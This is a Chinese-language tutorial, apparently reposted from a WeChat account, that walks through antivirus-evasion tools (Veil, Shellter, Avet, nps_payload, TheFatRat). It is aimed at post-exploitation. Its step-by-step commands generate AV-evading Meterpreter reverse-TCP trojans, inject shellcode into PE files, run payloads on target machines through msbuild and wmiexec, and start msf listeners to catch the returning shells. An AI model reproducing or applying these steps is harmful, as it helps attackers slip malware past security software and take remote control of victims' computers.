几款远控免杀工具使用总结

前言

常用后渗透过程中往往要使用msf和cs等工具的木马，而默认生成的木马非常容易被杀毒软件检出，这个时候就需要对木马进行免杀，本文介绍几款免杀工具的使用。

虽然经过杀毒软件多年更新，这些工具免杀效果可能已经很一般了，但是相比于自己写编码器解码器来做免杀更为方便简单，没有任何编程积累也可以直接使用。

veil

下载安装

docker安装veil

docker pull mattiasohlsson/veil

映射路径并运行

docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

介绍

list命令可查看其两个免杀工具，Evasion和Ordnance

• Evasion可用于文件免杀

• Ordnance可生成shellcode

生成msf免杀payload

进入Evasion use 1

查看可用的payloads
list payloads

选择要使用的payloads，如选择ruby的meterpreter/rev_tcp
use 39

设置监听ip和端口
set lhost xx.xx.xx.xx
set lport 4444

生成可执行文件并取名test
generate
test
由于刚才配置了映射路径，可执行文件被生成在本机的/tmp/veil-output/compiled路径下，对应的msf的配置文件被生成在/tmp/veil-output/handlers路径下

在本地使用msf配置文件开启msf监听
msfconsole -r test.rc

将test.exe传入目标机器，并运行，反弹回shell

使用自定义payload生成免杀木马

使用cs的payload为例

首先在cs的界面，攻击-生成后门-payload generator-veil，保存为payload.txt

开启veil，之前步骤同上

选择13号payload
generate

在generate之后的选项中选择3号，自定义payload，然后粘贴payload.txt内容，确认生成

shellter

下载安装

下载windows版

https://www.shellterproject.com/download/

使用shellter注入shellcode

寻找或自行编译一个32位pe程序作为载体

打开shellter

设置注入目标pe程序

选择本地payload或自定义payload

L为本地
输入1选择常规的Meterpreter_Reverse_TCP

设置lhost和lport

成功生成免杀恶意程序

Avet

下载安装

git clone https://github.com/govolution/avet
cd avet
./setup.sh

使用Avet生成免杀文件

启动

python ./avet.py

选择要使用的payload编号

设置监听ip端口以及其他配置

生成免杀可执行文件

nps_payload

下载安装

git clone https://github.com/trustedsec/nps_payload
cd nps_payload/
pip install -r requirements.txt

生成

python nps_payload.py

选择1生成msf类型payload

选择payload类型

设置IP和端口

生成

执行

1. 本地加载执行:
- %windir%Microsoft.NETFrameworkv4.0.30319msbuild.exemsbuild_nps.xml

2. 远程文件执行:

wmiexec.py:''@cmd.exe /c start %windir%Microsoft.NETFrameworkv4.0.30319msbuild.exe \<share>msbuild_nps.xml

msf监听

msfconsole -r msbuild_nps.rc

TheFatRat

下载安装

git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat
chmod +x setup.sh
./setup.sh

运行

fatrat

END

本文始发于微信公众号（网络侦查研究院）：几款远控免杀工具使用总结